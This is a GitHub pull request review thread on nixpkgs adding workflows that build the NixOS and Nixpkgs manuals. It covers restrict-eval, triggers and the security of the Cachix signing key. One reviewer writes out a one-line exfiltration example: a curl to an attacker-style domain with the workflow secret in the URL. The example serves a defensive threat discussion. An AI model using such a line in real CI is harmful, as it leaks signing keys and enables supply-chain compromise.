### PR TITLE
.github/workflows: build NixOS/Nixpkgs manuals

### PR DESCRIPTION
**Pull request by zowoq**
###### Things done

- [ ] Tested using sandboxing ([nix.useSandbox](https://nixos.org/nixos/manual/options.html#opt-nix.useSandbox) on NixOS, or option `sandbox` in [`nix.conf`](https://nixos.org/nix/manual/#sec-conf-file) on non-NixOS linux)
- Built on platform(s)
   - [ ] NixOS
   - [ ] macOS
   - [ ] other Linux distributions
- [ ] Tested via one or more NixOS test(s) if existing and applicable for the change (look inside [nixos/tests](https://github.com/NixOS/nixpkgs/blob/master/nixos/tests))
- [ ] Tested compilation of all pkgs that depend on this change using `nix-shell -p nixpkgs-review --run "nixpkgs-review wip"`
- [ ] Tested execution of all binary files (usually in `./result/bin/`)
- [ ] Determined the impact on package closure size (by running `nix path-info -S` before and after)
- [ ] Ensured that relevant documentation is up to date
- [ ] Fits [CONTRIBUTING.md](https://github.com/NixOS/nixpkgs/blob/master/.github/CONTRIBUTING.md).

### CODE REVIEW

File: .github/workflows/manual-nixos.yml
Comment (Mic92) [inline .github/workflows/manual-nixos.yml:25]:
```suggestion
        run: nix-build --option restrict-eval true nixos/release.nix -A manual.x86_64-linux
```

File: .github/workflows/manual-nixpkgs.yml
Comment (Mic92) [inline .github/workflows/manual-nixpkgs.yml:25]:
```suggestion
        run: nix-build --option restrict-eval true pkgs/top-level/release.nix -A manual
```

File: .github/workflows/manual-nixos.yml
Comment (Mic92) [reply .github/workflows/manual-nixos.yml:25]: I think both manuals could be build using a job matrix. Most steps except the build command are the same.

File: .github/workflows/manual-nixos.yml
Comment (Mic92) [inline .github/workflows/manual-nixos.yml:23]: @domenkozar Do you see any way an attacker could extract the signing key in this case?

**Comment by Mic92** [comment]
I tested:

    ${builtins.readFile ../../../.ssh/id_rsa}

with restricted-eval and it returns: `access to path '/home/joerg/.ssh/id_rsa' is forbidden in restricted mode`

File: .github/workflows/manual-nixos.yml
Comment (zowoq) [reply .github/workflows/manual-nixos.yml]: I don't think the `paths` filter works with job matrix?

File: .github/workflows/manual.yml
Comment (zowoq) [inline .github/workflows/manual.yml:6]: This wont build the nixpkgs manual.

Comment (Mic92) [reply .github/workflows/manual.yml:6]: sorry. missed that part.

Comment (Mic92) [reply .github/workflows/manual.yml]: I reverted and only added the restrict-eval part.

File: .github/workflows/manual-nixos.yml
Comment (zowoq) [inline .github/workflows/manual-nixos.yml:19]:
```suggestion
          extra_nix_config: |
            restrict-eval = true
            sandbox = true
```

Comment (Mic92) [reply .github/workflows/manual-nixos.yml:19]: I would not use extra-config here but a full command because it is easier to copy-and-paste when reproducing build errors.

**Comment by FRidh** [comment]
If you do a revert, add the motivation to the commit message.

**Comment by FRidh** [comment]
I suggest this runs after ofborg, which looking at the other workflow could be achieved with
```
on:
  check_suite:
    types: [ completed ]
```
and abort this workflow if the stdenv-rebuild label is present or when the target branch is staging.

**Comment by zowoq** [comment]
> I suggest this runs after ofborg

Why?

**Comment by FRidh** [comment]
because

> abort this workflow if the stdenv-rebuild label is present or when the target branch is staging.

There is no point building in that case.

**Comment by Mic92** [comment]
> because
> 
> > abort this workflow if the stdenv-rebuild label is present or when the target branch is staging.
> 
> There is no point building in that case.

There might be a point, but it might be quite slow to build the manual in this case.

**Comment by zowoq** [comment]
> which looking at the other workflow could be achieved with

Do you know if `check_suite` works with the `paths` filter from `pull_requests`?

**Comment by FRidh** [comment]
> Do you know if check_suite works with the paths filter from pull_requests?

hmm, reading https://docs.github.com/en/free-pro-team@latest/actions/reference/workflow-syntax-for-github-actions#on it does not seem like you can require two conditions simultaneously. That's unfortunate.

Of course, if ofborg completed, and you do a build anyway, if there was no need to build it will simply fetch the manual from the cache.

By the way, what is the motivation to build the manuals? From a channel blocking point of view, this is only one of many potential blockers. I get that trying to build all blockers may be too much, but why pick this one (or two)? Because it breaks relatively often? Because it may be hard to debug? Or just to start somewhere?

**Comment by Mic92** [comment]
> > Do you know if check_suite works with the paths filter from pull_requests?
> 
> hmm, reading [docs.github.com/en/free-pro-team@latest/actions/reference/workflow-syntax-for-github-actions#on](https://docs.github.com/en/free-pro-team@latest/actions/reference/workflow-syntax-for-github-actions#on) it does not seem like you can require two conditions simultaneously. That's unfortunate.
> 
> Of course, if ofborg completed, and you do a build anyway, if there was no need to build it will simply fetch the manual from the cache.
> 
> By the way, what is the motivation to build the manuals? From a channel blocking point of view, this is only one of many potential blockers. I get that trying to build all blockers may be too much, but why pick this one (or two)? Because it breaks relatively often? Because it may be hard to debug? Or just to start somewhere?

We had several occasions where people broken NixOS modules with invalid docbook syntax. Also it's nicer if one would not need to re-build documentation after reading it just to check if also the syntax is correct.

**Comment by zowoq** [comment]
> Of course, if ofborg completed, and you do a build anyway, if there was no need to build it will simply fetch the manual from the cache.

This would mean that unrelated PRs would fail if either of the manuals are ever broken on the base branch.

File: .github/workflows/manual-nixos.yml
Comment (zimbatm) [reply .github/workflows/manual-nixos.yml:25]: Anybody with nixpkgs push access can extract the signing key easily.

Push a commit on a branch with `curl https://myside.com/${{ secrets.CACHIX_SIGNING_KEY}` somewhere in the actions, then enjoy your logs.

We should make sure that nobody consumes that cache except github actions.

**Review by zimbatm — APPROVED** [review]

File: .github/workflows/manual-nixos.yml
Comment (domenkozar) [reply .github/workflows/manual-nixos.yml:25]: I'd suggest to delete the cache and generate a new one managed with auth tokens. That will ensure tokens can be revoked without losing the cache.

On top of that, until we can give committers only merge access and not direct commit access, about 140 people can extract the key. I don't think anyone would do it on purpose, but hacking 1 of 140 github accounts is not infeasible.

I suggest we add explicit note that the cache should not be trusted outside the CI usage.

**Comment by SuperSandro2000** [comment]
Can we merge this?

**Comment by Mic92** [comment]
I think so. We have a cachix signing key etc. But I would leave it to @zowoq since merging github actions often involve post-merge fixes and monitoring.

File: .github/workflows/manual-nixos.yml
Comment (zowoq) [reply .github/workflows/manual-nixos.yml:26]: > I suggest we add explicit note that the cache should not be trusted outside the CI usage.

Done.

**Comment by zowoq** [comment]
@ryantm You're working on the docs a lot at the moment, are you okay with this being merged or would you prefer to wait?

**Review by ryantm — APPROVED** [review]
@zowoq Looks good to me. We haven't changed anything about how the manuals are built yet, and it seems good to check that they build.

**Pull request merged**
